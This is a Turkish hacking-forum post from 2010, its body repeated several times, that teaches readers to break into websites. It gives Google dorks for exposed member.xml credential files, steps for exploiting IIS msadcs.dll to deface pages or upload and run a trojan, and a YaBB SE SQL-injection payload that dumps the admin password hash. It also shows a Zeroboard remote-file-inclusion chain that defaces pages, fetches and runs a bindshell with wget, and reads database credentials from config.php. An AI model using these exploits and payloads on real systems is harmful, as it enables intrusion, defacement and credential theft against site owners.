HACKER OO1
HOŞGELDİNİZ HACKEROO1
FORUM : BLOK : SİTEMİZ : =İÇRESİNDE
MÜKEMMEL PAYLAŞIMLAR VARDIR
SİZLERİNDE ARAMIZDA OLMANIZI İSTERİZ,TAMAMEN ÜCRETSİZ OLAN
PAYLAŞIMLAR VE ÜYELİGİMİZ:
KESİNLİKLE SİZLERİN İSTEKLERİNİZ
ÜZERİNE HAZIRLANMIŞ VE TASARLANMIŞTIR
SİTEMİZDE İYİ VAKİT GECİRMENİZ DİLEGİYLE
ADMİN

WEB HACLEME İLE İLGİLİ ÖNEMLİ BİR DÖKÜMAN-YAZDIM

Aşağa gitmek

WEB HACLEME İLE İLGİLİ ÖNEMLİ BİR DÖKÜMAN-YAZDIM

Mesaj tarafından Admin Bir Cuma Tem. 23, 2010 8:04 pm

WEB HACLEME İLE İLGİLİ ÖNEMLİ BİR DÖKÜMAN-YAZDIM
WEB HACLEME İLE İLGİLİ ÖNEMLİ BİR DÖKÜMAN-YAZDIM


ÖNCELİKLER EMEĞE SAYGI ARKADAŞLAR

sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
google dan fullxml diye aratin
daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza
CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.
3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.
Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h
yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll

tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve
cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm
buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip
yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar
II.yol
Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl
localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek
"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"
Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...
4- )
yabbse forumları nasıl hacklenir diye soranlara;
bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.
1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2
5- urln normalde buna benzer bisey ya;
6- onu su sekilde yaz
e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.
EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.
NOT:eğer bir sorunu olan varsa forumda cevaplarım

5- ) ZEROBOARD AÇIĞI
GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI

ilk önce
de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.

allinurl: /zboard/zboard.php
daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id
ve ............ ekrana bilgiler dökülüyor
2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)

daha sonra sayafaya imzamızı atıyoruz....
oda bu şekilde :
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html

eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell
ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.
config.php yı goruntulemek için :
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php

localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>
goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz....1- )
sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
bu adreslerde de işe yarıyor
google dan fullxml diye aratin
daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza
CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.
3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.
Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h
yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll

tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
Only registred user can see link on this forum!
Registred or Login on forum!
yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve
cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm
buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip
yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar
II.yol
Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl
localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek
"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"
Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...
4- )
yabbse forumları nasıl hacklenir diye soranlara;
bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.
1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2
5- urln normalde buna benzer bisey ya;
6- onu su sekilde yaz;
e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.
EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.
NOT:eğer bir sorunu olan varsa forumda cevaplarım

5- ) ZEROBOARD AÇIĞI
GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI
ilk önce
de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.
allinurl: /zboard/zboard.php
daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id
ve ............ ekrana bilgiler dökülüyor
Linux
2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)

daha sonra sayafaya imzamızı atıyoruz....
oda bu şekilde :
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html

eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell
ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.
config.php yı goruntulemek için :
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php
localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>
goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz....1- )
sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
bu adreslerde de işe yarıyor
2- )
google dan fullxml diye aratin
daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza
CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.
3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.
Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h
yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll

tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve
cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm
buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip
yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar
II.yol
Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl
localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek
"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"
Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...
4- )
yabbse forumları nasıl hacklenir diye soranlara;
bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.
1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2
5- urln normalde buna benzer bisey ya;
6- onu su sekilde yaz;
e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.
EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.
NOT:eğer bir sorunu olan varsa forumda cevaplarım

5- ) ZEROBOARD AÇIĞI
GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI
de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.

allinurl: /zboard/zboard.php
daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id
ve ............ ekrana bilgiler dökülüyor
2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)

daha sonra sayafaya imzamızı atıyoruz....
oda bu şekilde :
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html

eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell
ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.
config.php yı goruntulemek için :
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php

localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>
goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz....1- )
sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
bu adreslerde de işe yarıyor
2- )
google dan fullxml diye aratin
daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza
CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.
orn:
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.
3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.
Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h
yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll

tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve
cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm
buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip
yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar
II.yol
Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl
localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek
"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"
Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...
4- )
yabbse forumları nasıl hacklenir diye soranlara;
bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.
1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2
5- urln normalde buna benzer bisey ya;
6- onu su sekilde yaz;
e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.
EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.
NOT:eğer bir sorunu olan varsa forumda cevaplarım

5- ) ZEROBOARD AÇIĞI
GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI

ilk önce de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.

allinurl: /zboard/zboard.php
daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id
ve ............ ekrana bilgiler dökülüyor

2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)

daha sonra sayafaya imzamızı atıyoruz....
oda bu şekilde :

/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html

eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell
ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.
config.php yı goruntulemek için :
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php
localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>
goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz..../Link
avatar
Admin
Admin
Admin

Mesaj Sayısı : 346
rep-puan : 2147486744
Rep Puan : 63
Kayıt tarihi : 26/06/10
Yaş : 36
Nerden : izmir

Oyun Sayfası
Oyun Alanı:

Kullanıcı profilini gör http://hackeroo1.tr.gg/

Sayfa başına dön Aşağa gitmek

Geri: WEB HACLEME İLE İLGİLİ ÖNEMLİ BİR DÖKÜMAN-YAZDIM

Mesaj tarafından Cyber-Genius Bir Perş. Mart 24, 2011 12:35 pm

Razz Thanks
avatar
Cyber-Genius
GENEL BÖLÜM
GENEL BÖLÜM

Mesaj Sayısı : 1
rep-puan : 2827
Rep Puan : 0
Kayıt tarihi : 24/03/11

Kullanıcı profilini gör

Sayfa başına dön Aşağa gitmek

Geri: WEB HACLEME İLE İLGİLİ ÖNEMLİ BİR DÖKÜMAN-YAZDIM

Mesaj tarafından rojawaz Bir C.tesi Nis. 09, 2011 8:43 pm

teşekkürler admin
avatar
rojawaz
GENEL BÖLÜM
GENEL BÖLÜM

Mesaj Sayısı : 3
rep-puan : 2816
Rep Puan : 3
Kayıt tarihi : 09/04/11

Kullanıcı profilini gör

Sayfa başına dön Aşağa gitmek

Sayfa başına dön


 
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz